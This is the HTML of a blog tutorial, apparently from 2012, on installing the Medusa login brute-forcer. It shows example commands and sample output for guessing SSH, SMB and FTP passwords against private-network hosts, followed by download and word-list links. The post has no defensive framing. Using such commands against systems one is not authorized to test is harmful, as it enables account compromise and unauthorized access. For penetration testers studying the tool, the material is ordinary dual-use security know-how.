<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-wrapper.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">Generic Wrapper</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-web-form.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">Web Form</a></li>
</ul>
</td></tr>
</tbody></table>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-1736" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span>Compilation Process:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">% wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
% tar -zxvf medusa-2.0.tar.gz ; cd medusa-2.0
% ./configure ; make ; make install</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Also for SSH support download and install libssh2 library:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">% wget http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunet
% tar -zxvf libssh2-1.1.tar.gz ; cd libssh2-1.1
% ./ configure ; make ; make install</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
SSH Brute Force:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">% medusa -M ssh -H host.txt -U users.txt -p password
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [ssh] Host: 192.168.0.1 (1 of 11, 0 complete) User: foo (1 of 4, 0 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.1 (1 of 11, 0 complete) User: administrator (2 of 4, 1 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.1 (1 of 11, 0 complete) User: jmk (3 of 4, 2 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.1 (1 of 11, 0 complete) User: bar (4 of 4, 3 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.11 (2 of 11, 1 complete) User: foo (1 of 4, 0 complete) Password: password (1 of 1 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.11 (2 of 11, 1 complete) User: administrator (2 of 4, 1 complete) Password: password (1 of 1 complete)
ALERT: Medusa received SIGINT - Sending notification to login threads that we are are aborting.
ACCOUNT CHECK: [ssh] Host: 192.168.0.11 (2 of 11, 1 complete) User: jmk (3 of 4, 2 complete) Password: password (1 of 1 complete)
ALERT: To resume scan, add the following to your original command: "-Z h2u3u4h3."</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
SMB Brute Force:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">% medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
FTP Brute Force:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">% medusa -u test -P passwords.txt -h 192.168.0.20 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [ftp] Host: 192.168.0.20 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 12345 (1 of 100 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.0.20 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: password (2 of 100 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.0.20 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (3 of 100 complete)</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Download: <a href="http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Download GUI: <a href="http://wiki.taksmind.org/index.php?title=Medusa-gui" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://wiki.taksmind.org/index.php?title=Medusa-gui</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Word lists: <a href="http://www.outpost9.com/files/WordLists.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://www.outpost9.com/files/WordLists.html</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Documentation: <a href="http://www.foofus.net/~jmk/medusa/medusa.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://www.foofus.net/~jmk/medusa/medusa.html</a></div>
<br />
<i>©2012, copyright BLACK BURN </i></div>Unknownnoreply@blogger.com0